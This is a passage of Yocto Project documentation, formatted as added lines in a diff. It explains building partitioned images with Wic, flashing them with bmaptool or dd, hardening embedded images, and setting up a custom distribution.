+ from which to use artifacts.
+
+Regardless of the mode you use, you need to have the build artifacts
+ready and available.
+
+Raw Mode
+~~~~~~~~
+
+Running Wic in raw mode allows you to specify all the partitions through
+the ``wic`` command line. The primary use for raw mode is if you have
+built your kernel outside of the Yocto Project
+:term:`Build Directory`. In other words, you
+can point to arbitrary kernel, root filesystem locations, and so forth.
+Contrast this behavior with cooked mode where Wic looks in the Build
+Directory (e.g. ``tmp/deploy/images/``\ machine).
+
+The general form of the ``wic`` command in raw mode is:
+::
+
+ $ wic create wks_file options ...
+
+ Where:
+
+ wks_file:
+ An OpenEmbedded kickstart file. You can provide
+ your own custom file or use a file from a set of
+ existing files as described by further options.
+
+ optional arguments:
+ -h, --help show this help message and exit
+ -o OUTDIR, --outdir OUTDIR
+ name of directory to create image in
+ -e IMAGE_NAME, --image-name IMAGE_NAME
+ name of the image to use the artifacts from e.g. core-
+ image-sato
+ -r ROOTFS_DIR, --rootfs-dir ROOTFS_DIR
+ path to the /rootfs dir to use as the .wks rootfs
+ source
+ -b BOOTIMG_DIR, --bootimg-dir BOOTIMG_DIR
+ path to the dir containing the boot artifacts (e.g.
+ /EFI or /syslinux dirs) to use as the .wks bootimg
+ source
+ -k KERNEL_DIR, --kernel-dir KERNEL_DIR
+ path to the dir containing the kernel to use in the
+ .wks bootimg
+ -n NATIVE_SYSROOT, --native-sysroot NATIVE_SYSROOT
+ path to the native sysroot containing the tools to use
+ to build the image
+ -s, --skip-build-check
+ skip the build check
+ -f, --build-rootfs build rootfs
+ -c {gzip,bzip2,xz}, --compress-with {gzip,bzip2,xz}
+ compress image with specified compressor
+ -m, --bmap generate .bmap
+ --no-fstab-update Do not change fstab file.
+ -v VARS_DIR, --vars VARS_DIR
+ directory with <image>.env files that store bitbake
+ variables
+ -D, --debug output debug information
+
+.. note::
+
+ You do not need root privileges to run Wic. In fact, you should not
+ run as root when using the utility.
+
+Cooked Mode
+~~~~~~~~~~~
+
+Running Wic in cooked mode leverages off artifacts in the Build
+Directory. In other words, you do not have to specify kernel or root
+filesystem locations as part of the command. All you need to provide is
+a kickstart file and the name of the image from which to use artifacts
+by using the "-e" option. Wic looks in the Build Directory (e.g.
+``tmp/deploy/images/``\ machine) for artifacts.
+
+The general form of the ``wic`` command using Cooked Mode is as follows:
+::
+
+ $ wic create wks_file -e IMAGE_NAME
+
+ Where:
+
+ wks_file:
+ An OpenEmbedded kickstart file. You can provide
+ your own custom file or use a file from a set of
+ existing files provided with the Yocto Project
+ release.
+
+ required argument:
+ -e IMAGE_NAME, --image-name IMAGE_NAME
+ name of the image to use the artifacts from e.g. core-
+ image-sato
+
+.. _using-a-provided-kickstart-file:
+
+Using an Existing Kickstart File
+--------------------------------
+
+If you do not want to create your own kickstart file, you can use an
+existing file provided by the Wic installation. As shipped, kickstart
+files can be found in the :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories` in the
+following two locations:
+::
+
+ poky/meta-yocto-bsp/wic
+ poky/scripts/lib/wic/canned-wks
+
+Use the following command to list the available kickstart files:
+::
+
+ $ wic list images
+ genericx86 Create an EFI disk image for genericx86*
+ beaglebone-yocto Create SD card image for Beaglebone
+ edgerouter Create SD card image for Edgerouter
+ qemux86-directdisk Create a qemu machine 'pcbios' direct disk image
+ directdisk-gpt Create a 'pcbios' direct disk image
+ mkefidisk Create an EFI disk image
+ directdisk Create a 'pcbios' direct disk image
+ systemd-bootdisk Create an EFI disk image with systemd-boot
+ mkhybridiso Create a hybrid ISO image
+ sdimage-bootpart Create SD card image with a boot partition
+ directdisk-multi-rootfs Create multi rootfs image using rootfs plugin
+ directdisk-bootloader-config Create a 'pcbios' direct disk image with custom bootloader config
+
+When you use an existing file, you
+do not have to use the ``.wks`` extension. Here is an example in Raw
+Mode that uses the ``directdisk`` file:
+::
+
+ $ wic create directdisk -r rootfs_dir -b bootimg_dir \
+ -k kernel_dir -n native_sysroot
+
+Here are the actual partition language commands used in the
+``genericx86.wks`` file to generate an image:
+::
+
+ # short-description: Create an EFI disk image for genericx86*
+ # long-description: Creates a partitioned EFI disk image for genericx86* machines
+ part /boot --source bootimg-efi --sourceparams="loader=grub-efi" --ondisk sda --label msdos --active --align 1024
+ part / --source rootfs --ondisk sda --fstype=ext4 --label platform --align 1024 --use-uuid
+ part swap --ondisk sda --size 44 --label swap1 --fstype=swap
+
+ bootloader --ptable gpt --timeout=5 --append="rootfstype=ext4 console=ttyS0,115200 console=tty0"
+
+.. _wic-using-the-wic-plugin-interface:
+
+Using the Wic Plugin Interface
+------------------------------
+
+You can extend and specialize Wic functionality by using Wic plugins.
+This section explains the Wic plugin interface.
+
+.. note::
+
+ Wic plugins consist of "source" and "imager" plugins. Imager plugins
+ are beyond the scope of this section.
+
+Source plugins provide a mechanism to customize partition content during
+the Wic image generation process. You can use source plugins to map
+values that you specify using ``--source`` commands in kickstart files
+(i.e. ``*.wks``) to a plugin implementation used to populate a given
+partition.
+
+.. note::
+
+ If you use plugins that have build-time dependencies (e.g. native
+ tools, bootloaders, and so forth) when building a Wic image, you need
+ to specify those dependencies using the :term:`WKS_FILE_DEPENDS`
+ variable.
+
+Source plugins are subclasses defined in plugin files. As shipped, the
+Yocto Project provides several plugin files. You can see the source
+plugin files that ship with the Yocto Project
+:yocto_git:`here </cgit/cgit.cgi/poky/tree/scripts/lib/wic/plugins/source>`.
+Each of these plugin files contains source plugins that are designed to
+populate a specific Wic image partition.
+
+Source plugins are subclasses of the ``SourcePlugin`` class, which is
+defined in the ``poky/scripts/lib/wic/pluginbase.py`` file. For example,
+the ``BootimgEFIPlugin`` source plugin found in the ``bootimg-efi.py``
+file is a subclass of the ``SourcePlugin`` class, which is found in the
+``pluginbase.py`` file.
+
+You can also implement source plugins in a layer outside of the Source
+Repositories (external layer). To do so, be sure that your plugin files
+are located in a directory whose path is
+``scripts/lib/wic/plugins/source/`` within your external layer. When the
+plugin files are located there, the source plugins they contain are made
+available to Wic.
+
+When the Wic implementation needs to invoke a partition-specific
+implementation, it looks for the plugin with the same name as the
+``--source`` parameter used in the kickstart file given to that
+partition. For example, if the partition is set up using the following
+command in a kickstart file:
+::
+
+ part /boot --source bootimg-pcbios --ondisk sda --label boot --active --align 1024
+
+The methods defined as class
+members of the matching source plugin (i.e. ``bootimg-pcbios``) in the
+``bootimg-pcbios.py`` plugin file are used.
+
+To be more concrete, here is the corresponding plugin definition from
+the ``bootimg-pcbios.py`` file for the previous command along with an
+example method called by the Wic implementation when it needs to prepare
+a partition using an implementation-specific function:
+::
+
+ .
+ .
+ .
+ class BootimgPcbiosPlugin(SourcePlugin):
+ """
+ Create MBR boot partition and install syslinux on it.
+ """
+
+ name = 'bootimg-pcbios'
+ .
+ .
+ .
+ @classmethod
+ def do_prepare_partition(cls, part, source_params, creator, cr_workdir,
+ oe_builddir, bootimg_dir, kernel_dir,
+ rootfs_dir, native_sysroot):
+ """
+ Called to do the actual content population for a partition i.e. it
+ 'prepares' the partition to be incorporated into the image.
+ In this case, prepare content for legacy bios boot partition.
+ """
+ .
+ .
+ .
+
+If a
+subclass (plugin) itself does not implement a particular function, Wic
+locates and uses the default version in the superclass. It is for this
+reason that all source plugins are derived from the ``SourcePlugin``
+class.
+
+The ``SourcePlugin`` class defined in the ``pluginbase.py`` file defines
+a set of methods that source plugins can implement or override. Any
+plugins (subclass of ``SourcePlugin``) that do not implement a
+particular method inherit the implementation of the method from the
+``SourcePlugin`` class. For more information, see the ``SourcePlugin``
+class in the ``pluginbase.py`` file for details:
+
+The following list describes the methods implemented in the
+``SourcePlugin`` class:
+
+- ``do_prepare_partition()``: Called to populate a partition with
+ actual content. In other words, the method prepares the final
+ partition image that is incorporated into the disk image.
+
+- ``do_configure_partition()``: Called before
+ ``do_prepare_partition()`` to create custom configuration files for a
+ partition (e.g. syslinux or grub configuration files).
+
+- ``do_install_disk()``: Called after all partitions have been
+ prepared and assembled into a disk image. This method provides a hook
+ to allow finalization of a disk image (e.g. writing an MBR).
+
+- ``do_stage_partition()``: Special content-staging hook called
+ before ``do_prepare_partition()``. This method is normally empty.
+
+ Typically, a partition just uses the passed-in parameters (e.g. the
+ unmodified value of ``bootimg_dir``). However, in some cases, things
+ might need to be more tailored. As an example, certain files might
+ additionally need to be taken from ``bootimg_dir + /boot``. This hook
+ allows those files to be staged in a customized fashion.
+
+ .. note::
+
+ ``get_bitbake_var()`` allows you to access non-standard variables that
+ you might want to use for this behavior.
+
+You can extend the source plugin mechanism. To add more hooks, create
+more source plugin methods within ``SourcePlugin`` and the corresponding
+derived subclasses. The code that calls the plugin methods uses the
+``plugin.get_source_plugin_methods()`` function to find the method or
+methods needed by the call. Retrieval of those methods is accomplished
+by filling up a dict with keys that contain the method names of
+interest. On success, these will be filled in with the actual methods.
+See the Wic implementation for examples and details.
+
+.. _wic-usage-examples:
+
+Wic Examples
+------------
+
+This section provides several examples that show how to use the Wic
+utility. All the examples assume the list of requirements in the
+"`Requirements <#wic-requirements>`__" section have been met. The
+examples assume the previously generated image is
+``core-image-minimal``.
+
+.. _generate-an-image-using-a-provided-kickstart-file:
+
+Generate an Image using an Existing Kickstart File
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This example runs in Cooked Mode and uses the ``mkefidisk`` kickstart
+file:
+::
+
+ $ wic create mkefidisk -e core-image-minimal
+ INFO: Building wic-tools...
+ .
+ .
+ .
+ INFO: The new image(s) can be found here:
+ ./mkefidisk-201804191017-sda.direct
+
+ The following build artifacts were used to create the image(s):
+ ROOTFS_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
+ BOOTIMG_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
+ KERNEL_DIR: /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
+ NATIVE_SYSROOT: /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
+
+ INFO: The image(s) were created using OE kickstart file:
+ /home/stephano/build/master/openembedded-core/scripts/lib/wic/canned-wks/mkefidisk.wks
+
+The previous example shows the easiest way to create an image by running
+in cooked mode and supplying a kickstart file and the "-e" option to
+point to the existing build artifacts. Your ``local.conf`` file needs to
+have the :term:`MACHINE` variable set
+to the machine you are using, which is "qemux86" in this example.
+
+Once the image builds, the output provides image location, artifact use,
+and kickstart file information.
+
+.. note::
+
+ You should always verify the details provided in the output to make
+ sure that the image was indeed created exactly as expected.
+
+Continuing with the example, you can now write the image from the Build
+Directory onto a USB stick, or whatever media for which you built your
+image, and boot from the media. You can write the image by using
+``bmaptool`` or ``dd``:
+::
+
+ $ oe-run-native bmaptool copy mkefidisk-201804191017-sda.direct /dev/sdX
+
+or ::
+
+ $ sudo dd if=mkefidisk-201804191017-sda.direct of=/dev/sdX
+
+.. note::
+
+ For more information on how to use the ``bmaptool``
+ to flash a device with an image, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:flashing images using \`\`bmaptool\`\``"
+ section.
+
+Using a Modified Kickstart File
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Because partitioned image creation is driven by the kickstart file, it
+is easy to affect image creation by changing the parameters in the file.
+This next example demonstrates that through modification of the
+``directdisk-gpt`` kickstart file.
+
+As mentioned earlier, you can use the command ``wic list images`` to
+show the list of existing kickstart files. The directory in which the
+``directdisk-gpt.wks`` file resides is
+``scripts/lib/image/canned-wks/``, which is located in the
+:term:`Source Directory` (e.g. ``poky``).
+Because available files reside in this directory, you can create and add
+your own custom files to the directory. Subsequent use of the
+``wic list images`` command would then include your kickstart files.
+
+In this example, the existing ``directdisk-gpt`` file already does most
+of what is needed. However, for the hardware in this example, the image
+will need to boot from ``sdb`` instead of ``sda``, which is what the
+``directdisk-gpt`` kickstart file uses.
+
+The example begins by making a copy of the ``directdisk-gpt.wks`` file
+in the ``scripts/lib/image/canned-wks`` directory and then by changing
+the lines that specify the target disk from which to boot.
+::
+
+ $ cp /home/stephano/poky/scripts/lib/wic/canned-wks/directdisk-gpt.wks \
+ /home/stephano/poky/scripts/lib/wic/canned-wks/directdisksdb-gpt.wks
+
+Next, the example modifies the ``directdisksdb-gpt.wks`` file and
+changes all instances of "``--ondisk sda``" to "``--ondisk sdb``". The
+example changes the following two lines and leaves the remaining lines
+untouched:
+::
+
+ part /boot --source bootimg-pcbios --ondisk sdb --label boot --active --align 1024
+ part / --source rootfs --ondisk sdb --fstype=ext4 --label platform --align 1024 --use-uuid
+
+Once the lines are changed, the
+example generates the ``directdisksdb-gpt`` image. The command points
+the process at the ``core-image-minimal`` artifacts for the Next Unit of
+Computing (nuc) :term:`MACHINE` the
+``local.conf``.
+::
+
+ $ wic create directdisksdb-gpt -e core-image-minimal
+ INFO: Building wic-tools...
+ .
+ .
+ .
+ Initialising tasks: 100% |#######################################| Time: 0:00:01
+ NOTE: Executing SetScene Tasks
+ NOTE: Executing RunQueue Tasks
+ NOTE: Tasks Summary: Attempted 1161 tasks of which 1157 didn't need to be rerun and all succeeded.
+ INFO: Creating image(s)...
+
+ INFO: The new image(s) can be found here:
+ ./directdisksdb-gpt-201710090938-sdb.direct
+
+ The following build artifacts were used to create the image(s):
+ ROOTFS_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
+ BOOTIMG_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
+ KERNEL_DIR: /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
+ NATIVE_SYSROOT: /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
+
+ INFO: The image(s) were created using OE kickstart file:
+ /home/stephano/poky/scripts/lib/wic/canned-wks/directdisksdb-gpt.wks
+
+Continuing with the example, you can now directly ``dd`` the image to a
+USB stick, or whatever media for which you built your image, and boot
+the resulting media:
+::
+
+ $ sudo dd if=directdisksdb-gpt-201710090938-sdb.direct of=/dev/sdb
+ 140966+0 records in
+ 140966+0 records out
+ 72174592 bytes (72 MB, 69 MiB) copied, 78.0282 s, 925 kB/s
+ $ sudo eject /dev/sdb
+
+Using a Modified Kickstart File and Running in Raw Mode
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This next example manually specifies each build artifact (runs in Raw
+Mode) and uses a modified kickstart file. The example also uses the
+``-o`` option to cause Wic to create the output somewhere other than the
+default output directory, which is the current directory:
+::
+
+ $ wic create /home/stephano/my_yocto/test.wks -o /home/stephano/testwic \
+ --rootfs-dir /home/stephano/build/master/build/tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/rootfs \
+ --bootimg-dir /home/stephano/build/master/build/tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share \
+ --kernel-dir /home/stephano/build/master/build/tmp/deploy/images/qemux86 \
+ --native-sysroot /home/stephano/build/master/build/tmp/work/i586-poky-linux/wic-tools/1.0-r0/recipe-sysroot-native
+
+ INFO: Creating image(s)...
+
+ INFO: The new image(s) can be found here:
+ /home/stephano/testwic/test-201710091445-sdb.direct
+
+ The following build artifacts were used to create the image(s):
+ ROOTFS_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
+ BOOTIMG_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
+ KERNEL_DIR: /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
+ NATIVE_SYSROOT: /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
+
+ INFO: The image(s) were created using OE kickstart file:
+ /home/stephano/my_yocto/test.wks
+
+For this example,
+:term:`MACHINE` did not have to be
+specified in the ``local.conf`` file since the artifact is manually
+specified.
+
+Using Wic to Manipulate an Image
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Wic image manipulation allows you to shorten turnaround time during
+image development. For example, you can use Wic to delete the kernel
+partition of a Wic image and then insert a newly built kernel. This
+saves you time from having to rebuild the entire image each time you
+modify the kernel.
+
+.. note::
+
+ In order to use Wic to manipulate a Wic image as in this example,
+ your development machine must have the ``mtools`` package installed.
+
+The following example examines the contents of the Wic image, deletes
+the existing kernel, and then inserts a new kernel:
+
+1. *List the Partitions:* Use the ``wic ls`` command to list all the
+ partitions in the Wic image:
+ ::
+
+ $ wic ls tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic
+ Num Start End Size Fstype
+ 1 1048576 25041919 23993344 fat16
+ 2 25165824 72157183 46991360 ext4
+
+ The previous output shows two partitions in the
+ ``core-image-minimal-qemux86.wic`` image.
+
+2. *Examine a Particular Partition:* Use the ``wic ls`` command again
+ but in a different form to examine a particular partition.
+
+ .. note::
+
+ You can get command usage on any Wic command using the following
+ form:
+ ::
+
+ $ wic help command
+
+
+ For example, the following command shows you the various ways to
+ use the
+ wic ls
+ command:
+ ::
+
+ $ wic help ls
+
+
+ The following command shows what is in Partition one:
+ ::
+
+ $ wic ls tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1
+ Volume in drive : is boot
+ Volume Serial Number is E894-1809
+ Directory for ::/
+
+ libcom32 c32 186500 2017-10-09 16:06
+ libutil c32 24148 2017-10-09 16:06
+ syslinux cfg 220 2017-10-09 16:06
+ vesamenu c32 27104 2017-10-09 16:06
+ vmlinuz 6904608 2017-10-09 16:06
+ 5 files 7 142 580 bytes
+ 16 582 656 bytes free
+
+ The previous output shows five files, with the
+ ``vmlinuz`` being the kernel.
+
+ .. note::
+
+ If you see the following error, you need to update or create a
+ ``~/.mtoolsrc`` file and be sure to have the line "mtools_skip_check=1"
+ in the file. Then, run the Wic command again:
+ ::
+
+ ERROR: _exec_cmd: /usr/bin/mdir -i /tmp/wic-parttfokuwra ::/ returned '1' instead of 0
+ output: Total number of sectors (47824) not a multiple of sectors per track (32)!
+ Add mtools_skip_check=1 to your .mtoolsrc file to skip this test
+
+
+3. *Remove the Old Kernel:* Use the ``wic rm`` command to remove the
+ ``vmlinuz`` file (kernel):
+ ::
+
+ $ wic rm tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1/vmlinuz
+
+4. *Add In the New Kernel:* Use the ``wic cp`` command to add the
+ updated kernel to the Wic image. Depending on how you built your
+ kernel, it could be in different places. If you used ``devtool`` and
+ an SDK to build your kernel, it resides in the ``tmp/work`` directory
+ of the extensible SDK. If you used ``make`` to build the kernel, the
+ kernel will be in the ``workspace/sources`` area.
+
+ The following example assumes ``devtool`` was used to build the
+ kernel:
+ ::
+
+ cp ~/poky_sdk/tmp/work/qemux86-poky-linux/linux-yocto/4.12.12+git999-r0/linux-yocto-4.12.12+git999/arch/x86/boot/bzImage \
+ ~/poky/build/tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1/vmlinuz
+
+ Once the new kernel is added back into the image, you can use the
+ ``dd`` command or :ref:`bmaptool
+ <dev-manual/dev-manual-common-tasks:flashing images using \`\`bmaptool\`\`>`
+ to flash your wic image onto an SD card or USB stick and test your
+ target.
+
+ .. note::
+
+ Using ``bmaptool`` is generally 10 to 20 times faster than using ``dd``.
+
+Flashing Images Using ``bmaptool``
+==================================
+
+A fast and easy way to flash an image to a bootable device is to use
+Bmaptool, which is integrated into the OpenEmbedded build system.
+Bmaptool is a generic tool that creates a file's block map (bmap) and
+then uses that map to copy the file. As compared to traditional tools
+such as dd or cp, Bmaptool can copy (or flash) large files like raw
+system image files much faster.
+
+.. note::
+
+ - If you are using Ubuntu or Debian distributions, you can install
+ the ``bmap-tools`` package using the following command and then
+ use the tool without specifying ``PATH`` even from the root
+ account:
+ ::
+
+ $ sudo apt-get install bmap-tools
+
+ - If you are unable to install the ``bmap-tools`` package, you will
+ need to build Bmaptool before using it. Use the following command:
+ ::
+
+ $ bitbake bmap-tools-native
+
+Following, is an example that shows how to flash a Wic image. Realize
+that while this example uses a Wic image, you can use Bmaptool to flash
+any type of image. Use these steps to flash an image using Bmaptool:
+
+1. *Update your local.conf File:* You need to have the following set
+ in your ``local.conf`` file before building your image:
+ ::
+
+ IMAGE_FSTYPES += "wic wic.bmap"
+
+2. *Get Your Image:* Either have your image ready (pre-built with the
+ :term:`IMAGE_FSTYPES`
+ setting previously mentioned) or take the step to build the image:
+ ::
+
+ $ bitbake image
+
+3. *Flash the Device:* Flash the device with the image by using Bmaptool
+ depending on your particular setup. The following commands assume the
+ image resides in the Build Directory's ``deploy/images/`` area:
+
+ - If you have write access to the media, use this command form:
+ ::
+
+ $ oe-run-native bmap-tools-native bmaptool copy build-directory/tmp/deploy/images/machine/image.wic /dev/sdX
+
+ - If you do not have write access to the media, set your permissions
+ first and then use the same command form:
+ ::
+
+ $ sudo chmod 666 /dev/sdX
+ $ oe-run-native bmap-tools-native bmaptool copy build-directory/tmp/deploy/images/machine/image.wic /dev/sdX
+
+For help on the ``bmaptool`` command, use the following command:
+::
+
+ $ bmaptool --help
+
+Making Images More Secure
+=========================
+
+Security is of increasing concern for embedded devices. Consider the
+issues and problems discussed in just this sampling of work found across
+the Internet:
+
+- *"*\ `Security Risks of Embedded
+ Systems <https://www.schneier.com/blog/archives/2014/01/security_risks_9.html>`__\ *"*
+ by Bruce Schneier
+
+- *"*\ `Internet Census
+ 2012 <http://census2012.sourceforge.net/paper.html>`__\ *"* by Carna
+ Botnet
+
+- *"*\ `Security Issues for Embedded
+ Devices <http://elinux.org/images/6/6f/Security-issues.pdf>`__\ *"*
+ by Jake Edge
+
+When securing your image is of concern, there are steps, tools, and
+variables that you can consider to help you reach the security goals you
+need for your particular device. Not all situations are identical when
+it comes to making an image secure. Consequently, this section provides
+some guidance and suggestions for consideration when you want to make
+your image more secure.
+
+.. note::
+
+ Because the security requirements and risks are different for every
+ type of device, this section cannot provide a complete reference on
+ securing your custom OS. It is strongly recommended that you also
+ consult other sources of information on embedded Linux system
+ hardening and on security.
+
+General Considerations
+----------------------
+
+General considerations exist that help you create more secure images.
+You should consider the following suggestions to help make your device
+more secure:
+
+- Scan additional code you are adding to the system (e.g. application
+ code) by using static analysis tools. Look for buffer overflows and
+ other potential security problems.
+
+- Pay particular attention to the security for any web-based
+ administration interface.
+
+ Web interfaces typically need to perform administrative functions and
+ tend to need to run with elevated privileges. Thus, the consequences
+ resulting from the interface's security becoming compromised can be
+ serious. Look for common web vulnerabilities such as
+ cross-site-scripting (XSS), unvalidated inputs, and so forth.
+
+ As with system passwords, the default credentials for accessing a
+ web-based interface should not be the same across all devices. This
+ is particularly true if the interface is enabled by default as it can
+ be assumed that many end-users will not change the credentials.
+
+- Ensure you can update the software on the device to mitigate
+ vulnerabilities discovered in the future. This consideration
+ especially applies when your device is network-enabled.
+
+- Ensure you remove or disable debugging functionality before producing
+ the final image. For information on how to do this, see the
+ "`Considerations Specific to the OpenEmbedded Build
+ System <#considerations-specific-to-the-openembedded-build-system>`__"
+ section.
+
+- Ensure you have no network services listening that are not needed.
+
+- Remove any software from the image that is not needed.
+
+- Enable hardware support for secure boot functionality when your
+ device supports this functionality.
+
+Security Flags
+--------------
+
+The Yocto Project has security flags that you can enable that help make
+your build output more secure. The security flags are in the
+``meta/conf/distro/include/security_flags.inc`` file in your
+:term:`Source Directory` (e.g. ``poky``).
+
+.. note::
+
+ Depending on the recipe, certain security flags are enabled and
+ disabled by default.
+
+Use the following line in your ``local.conf`` file or in your custom
+distribution configuration file to enable the security compiler and
+linker flags for your build:
+::
+
+ require conf/distro/include/security_flags.inc
+
+Considerations Specific to the OpenEmbedded Build System
+--------------------------------------------------------
+
+You can take some steps that are specific to the OpenEmbedded build
+system to make your images more secure:
+
+- Ensure "debug-tweaks" is not one of your selected
+ :term:`IMAGE_FEATURES`.
+ When creating a new project, the default is to provide you with an
+ initial ``local.conf`` file that enables this feature using the
+ :term:`EXTRA_IMAGE_FEATURES`
+ variable with the line:
+ ::
+
+ EXTRA_IMAGE_FEATURES = "debug-tweaks"
+
+ To disable that feature, simply comment out that line in your
+ ``local.conf`` file, or make sure ``IMAGE_FEATURES`` does not contain
+ "debug-tweaks" before producing your final image. Among other things,
+ leaving this in place sets the root password as blank, which makes
+ logging in for debugging or inspection easy during development but
+ also means anyone can easily log in during production.
+
+- It is possible to set a root password for the image and also to set
+ passwords for any extra users you might add (e.g. administrative or
+ service type users). When you set up passwords for multiple images or
+ users, you should not duplicate passwords.
+
+ To set up passwords, use the
+ :ref:`extrausers <ref-classes-extrausers>`
+ class, which is the preferred method. For an example on how to set up
+ both root and user passwords, see the
+ ":ref:`extrausers.bbclass <ref-classes-extrausers>`"
+ section.
+
+ .. note::
+
+ When adding extra user accounts or setting a root password, be
+ cautious about setting the same password on every device. If you
+ do this, and the password you have set is exposed, then every
+ device is now potentially compromised. If you need this access but
+ want to ensure security, consider setting a different, random
+ password for each device. Typically, you do this as a separate
+ step after you deploy the image onto the device.
+
+- Consider enabling a Mandatory Access Control (MAC) framework such as
+ SMACK or SELinux and tuning it appropriately for your device's usage.
+ You can find more information in the
+ :yocto_git:`meta-selinux </cgit/cgit.cgi/meta-selinux/>` layer.
+
+Tools for Hardening Your Image
+------------------------------
+
+The Yocto Project provides tools for making your image more secure. You
+can find these tools in the ``meta-security`` layer of the
+:yocto_git:`Yocto Project Source Repositories <>`.
+
+Creating Your Own Distribution
+==============================
+
+When you build an image using the Yocto Project and do not alter any
+distribution :term:`Metadata`, you are
+creating a Poky distribution. If you wish to gain more control over
+package alternative selections, compile-time options, and other
+low-level configurations, you can create your own distribution.
+
+To create your own distribution, the basic steps consist of creating
+your own distribution layer, creating your own distribution
+configuration file, and then adding any needed code and Metadata to the
+layer. The following steps provide some more detail:
+
+- *Create a layer for your new distro:* Create your distribution layer
+ so that you can keep your Metadata and code for the distribution
+ separate. It is strongly recommended that you create and use your own
+ layer for configuration and code. Using your own layer as compared to
+ just placing configurations in a ``local.conf`` configuration file
+ makes it easier to reproduce the same build configuration when using
+ multiple build machines. See the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+ section for information on how to quickly set up a layer.
+
+- *Create the distribution configuration file:* The distribution
+ configuration file needs to be created in the ``conf/distro``
+ directory of your layer. You need to name it using your distribution
+ name (e.g. ``mydistro.conf``).
+
+ .. note::
+
+ The :term:`DISTRO` variable in your ``local.conf`` file determines the
+ name of your distribution.
+
+ You can split out parts of your configuration file into include files
+ and then "require" them from within your distribution configuration
+ file. Be sure to place the include files in the
+ ``conf/distro/include`` directory of your layer. A common example
+ usage of include files would be to separate out the selection of
+ desired version and revisions for individual recipes.
+
+ Your configuration file needs to set the following required
+ variables:
+
+ - :term:`DISTRO_NAME`
+
+ - :term:`DISTRO_VERSION`
+
+ These following variables are optional and you typically set them
+ from the distribution configuration file:
+
+ - :term:`DISTRO_FEATURES`
+
+ - :term:`DISTRO_EXTRA_RDEPENDS`
+
+ - :term:`DISTRO_EXTRA_RRECOMMENDS`
+
+ - :term:`TCLIBC`
+
+ .. tip::
+
+ If you want to base your distribution configuration file on the
+ very basic configuration from OE-Core, you can use
+ ``conf/distro/defaultsetup.conf`` as a reference and just include
+ variables that differ as compared to ``defaultsetup.conf``.
+ Alternatively, you can create a distribution configuration file
+ from scratch using the ``defaultsetup.conf`` file or configuration files
+ from other distributions such as Poky or Angstrom as references.
+
+- *Provide miscellaneous variables:* Be sure to define any other
+ variables for which you want to create a default or enforce as part
+ of the distribution configuration. You can include nearly any
+ variable from the ``local.conf`` file. The variables you use are not
+ limited to the list in the previous bulleted item.
+
+- *Point to Your distribution configuration file:* In your
+ ``local.conf`` file in the :term:`Build Directory`,
+ set your
+ :term:`DISTRO` variable to point to
+ your distribution's configuration file. For example, if your
+ distribution's configuration file is named ``mydistro.conf``, then
+ you point to it as follows:
+ ::
+
+ DISTRO = "mydistro"
+
+- *Add more to the layer if necessary:* Use your layer to hold other
+ information needed for the distribution:
+
+ - Add recipes for installing distro-specific configuration files
+ that are not already installed by another recipe. If you have
+ distro-specific configuration files that are included by an
+ existing recipe, you should add an append file (``.bbappend``) for
+ those. For general information and recommendations on how to add
+ recipes to your layer, see the "`Creating Your Own
+ Layer <#creating-your-own-layer>`__" and "`Following Best
+ Practices When Creating
+ Layers <#best-practices-to-follow-when-creating-layers>`__"
+ sections.
+
+ - Add any image recipes that are specific to your distribution.
+
+ - Add a ``psplash`` append file for a branded splash screen. For
+ information on append files, see the "`Using .bbappend Files in
+ Your Layer <#using-bbappend-files>`__" section.
+
+ - Add any other append files to make custom changes that are
+ specific to individual recipes.
+
+Creating a Custom Template Configuration Directory
+==================================================
+
+If you are producing your own customized version of the build system for
+use by other users, you might want to customize the message shown by the
+setup script or you might want to change the template configuration
+files (i.e. ``local.conf`` and ``bblayers.conf``) that are created in a
+new build directory.
+
+The OpenEmbedded build system uses the environment variable
+``TEMPLATECONF`` to locate the directory from which it gathers
+configuration information that ultimately ends up in the
+:term:`Build Directory` ``conf`` directory.
+By default, ``TEMPLATECONF`` is set as follows in the ``poky``
+repository:
+::
+
+ TEMPLATECONF=${TEMPLATECONF:-meta-poky/conf}
+
+This is the
+directory used by the build system to find templates from which to build
+some key configuration files. If you look at this directory, you will
+see the ``bblayers.conf.sample``, ``local.conf.sample``, and
+``conf-notes.txt`` files. The build system uses these files to form the
+respective ``bblayers.conf`` file, ``local.conf`` file, and display the
+list of BitBake targets when running the setup script.
+
+To override these default configuration files with configurations you
+want used within every new Build Directory, simply set the
